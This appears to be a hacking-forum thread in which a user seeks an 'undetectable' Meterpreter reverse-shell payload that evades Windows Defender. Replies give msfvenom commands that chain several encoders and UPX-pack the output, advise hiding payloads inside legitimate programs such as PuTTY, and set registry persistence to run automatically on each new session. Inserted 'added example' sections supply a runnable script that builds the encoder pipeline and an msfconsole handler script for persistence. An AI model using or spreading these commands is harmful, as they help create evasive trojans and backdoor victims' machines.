Hi, I need some help with creating an undetectable payload.
The script I am using is:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 200 > xxx.exe
After I create the payload I move it to a Windows 10 64-bit machine and it is immediately picked up.
I was wondering, maybe it is because of the x86 encoder? Even when I use Veil-Evasion, Windows Defender gets it.
Are there better encoders/crypters known in Kali that I am missing?
The only way I get past my Windows Defender is by using Shellter, but then I don't get a Meterpreter shell back...
7 Responses
Use Veil-Evasion, very similar to msfvenom. In my experience, much higher success rate with Veil-Evasion against AV.
I don't know why, but Veil-Evasion can't get past my Windows Defender.
Well, the most straightforward solution would be to create your own shellcode and embed it into legitimate software (e.g. PuTTY). But what else you can do is to encode it multiple times (like this:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=31337 -f raw -e x86/shikata_ga_nai -i 5 \
  | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 4 -f raw \
  | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -f raw \
  | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f raw \
  | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f raw \
  | msfvenom -a x86 --platform windows -e x86/countdown -i 9 -f exe -o /root/.exe; upx -9 -v -o /root/.exe /root/.exe)
and add a -k option and a program of your choice to run with the payload.
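The chained encode-and-pipe approach from the reply above, as an added example that is not code from the thread. It generalises the reply's fixed six-stage chain to any list of `encoder:iterations` stages: every stage except the last emits raw shellcode (`-f raw`) and the next stage reads it back as a custom payload with `-p -`; only the last stage writes the exe. `LHOST`, `LPORT`, the output path and the stage list are placeholder assumptions; msfvenom is only invoked when the script is called with `--run` and msfvenom is on `PATH`, otherwise the generated command is printed. Note that the encoder names carry underscores (`x86/shikata_ga_nai`, `x86/alpha_upper`); msfvenom rejects the underscore-less spellings that forum formatting tends to produce.

```shell
#!/bin/sh
# Added example (not from the thread): generate the multi-stage msfvenom encoder
# pipeline the reply describes. Placeholders: LHOST/LPORT/output path/stage list.

# chain_cmd LHOST LPORT OUTFILE "enc:iters enc:iters ..."
# Prints a single shell pipeline. Stage 1 generates the payload, intermediate
# stages read raw shellcode from stdin (-p -) and re-encode it, the last stage
# writes the exe. A one-stage list collapses to a plain msfvenom command.
chain_cmd() {
    lhost=$1; lport=$2; out=$3
    set -- $4                     # split the stage list into positional args
    n=$#; i=0; cmd=""
    for st in "$@"; do
        i=$((i + 1))
        enc=${st%%:*}             # text before the colon: encoder name
        it=${st##*:}              # text after the colon: iteration count
        if [ "$i" -eq 1 ]; then
            src="-p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport"
        else
            src="-p -"            # custom payload: raw shellcode from stdin
        fi
        if [ "$i" -eq "$n" ]; then
            fmt="-f exe -o $out"  # final stage: wrap into a PE
        else
            fmt="-f raw"          # intermediate: hand raw bytes to the next stage
        fi
        stage="msfvenom $src -a x86 --platform windows -e $enc -i $it $fmt"
        if [ -z "$cmd" ]; then cmd=$stage; else cmd="$cmd | $stage"; fi
    done
    printf '%s\n' "$cmd"
}

# Same stage order as the reply's chain (placeholders for host/port/path).
STAGES="x86/shikata_ga_nai:5 x86/alpha_upper:4 x86/shikata_ga_nai:6 x86/countdown:5 x86/shikata_ga_nai:9 x86/countdown:9"

if [ "${1:-}" = "--run" ]; then
    if command -v msfvenom >/dev/null 2>&1; then
        sh -c "$(chain_cmd 10.0.0.2 4444 ./payload.exe "$STAGES")"
    else
        echo "msfvenom not on PATH; generated command follows:" >&2
        chain_cmd 10.0.0.2 4444 ./payload.exe "$STAGES"
    fi
fi
```

Each stage prepends its own decoder stub to the previous output, so the final binary carries six decoder loops in front of the payload; static signatures for the shikata_ga_nai decoder stub still match the outermost stage regardless of how many inner stages follow it, which is consistent with the results reported later in this thread.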
Tried the script... Windows Defender still eats it up. Any other suggestions?
Have you checked out my tutorial? Instead of msfvenom or Veil, use Metasploit to create a raw payload. Then use Shellter with either an exe you create in Windows, or another 32-bit exe, with your payload created by Metasploit. https://null-byte.wonderhowto.com/how-to/create-undetectable-trojan-using-domain-name-0171563/
Combining the payload with a legitimate exe will get past Defender. However, a persistent connection (as far as I know) requires the payload to be uncombined, and THAT gets chewed up by Defender. Any other ideas?
For persistence, use the registry persistence exploit, found at exploit/windows/local/registry_persistence.
I like to set it up in the listener so it automatically gets persistence when a session is created. After typing your listener info and before typing exploit -j, type: set AutoRunScript exploit/windows/local/registry_persistence LHOST=IP LPORT=port
Then exploit -j.
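The handler setup from the reply above written out as an msfconsole resource script, added here as an example and not taken from the thread. It keeps the order the reply gives (listener options first, then AutoRunScript, then exploit -j) and uses exploit/multi/handler with the reverse_tcp Meterpreter payload, which the reply calls "your listener info" without spelling out. 10.0.0.2 and 4444 are placeholder assumptions, and the AutoRunScript value is the one the reply states works; the handler supplies SESSION to the autorun module itself. Load it with `msfconsole -r handler.rc`.

```rc
# Added example, not from the thread: persistence-on-connect handler.
# Placeholders: LHOST 10.0.0.2, LPORT 4444.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.2
set LPORT 4444
set ExitOnSession false
# Runs against every new session before control returns to the operator
# (module path and option names as given in the reply above).
set AutoRunScript exploit/windows/local/registry_persistence LHOST=10.0.0.2 LPORT=4444
exploit -j
```

`ExitOnSession false` keeps the job alive after the first callback so the re-executed persistence payload has a handler to return to; without it the handler job ends with the first session.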